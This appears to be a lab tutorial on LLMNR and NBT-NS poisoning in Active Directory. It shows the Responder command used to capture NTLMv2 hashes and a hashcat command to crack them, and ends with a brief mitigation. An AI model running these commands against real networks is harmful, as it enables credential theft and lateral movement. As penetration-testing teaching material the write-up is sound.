LLMNR Poisoning and Relay
Link-Local Multicast Name Resolution (LLMNR) is a windows component which acts as a host discovery/identification method in windows systems. LLMNR and NBT-NS (NetBios Name System)are used as an alternative for Domain Name System (DNS) and can identify other hosts in same local link or network. In Active Directory environments we can see very often that, LLMNR is enabled and being used widely.
But this method of host resolution has severe security impact, as when a non-existing host is searched using LLMNR method, it broadcasts the search request to every system connected to the local network. As a result, if any of the systems in local network is somehow compromised by an attacker, it also receives the host search query and can send a response to the victim (the system which initiated the host resolution query) that it knows the host and in turn ask for the password hash of the victim.
To perform this attack we will use an Active Directory setup and a Kali machine. To built an AD setup in your machine follow this link:
After the setup is ready, launch a kali machine. We are going to use Responder tool already present in kali. Responder is an open source tool which has built-in HTTP/SMB/MSSQL/FTP/LDAP rouge server hosting capability and supports NTLMv1, NTLMv2, LMv2.
Launch Responder using the following command: python Responder.py -I eth0 -rdw
-I : chooses the network interface, here eth0
Now, the listener is up and running, we will search for the Responder IP from any windows machine connected in the AD network and see if Responder can capture the hash or not. In a real world attack scenario, after setting up the listener we have to wait for users in the network to search for a non-existing machine address.
Now, we can see the hash of the windows machine has been captured in our Responder window. We will copy the hash and try to crack it using Hashcat.
Let’s run Hashcat with rockyou.txt to crack the hash. We will use the following command : hashcat -m 5600 hash.txt rockyou.txt -O
-m 5600 is to notify Hashcat to use the module NTLMv2 which has a number 5600 and -O is optimizing the operation.
In this case, the password was very simple and Hashcat took almost no time to crack it. Even if the password is very strong, we can use the hash for relay attacks, which we will discuss in the next post.
As a mitigation effort it is always better to disable Multicast Name Resolution and NBT-NS.
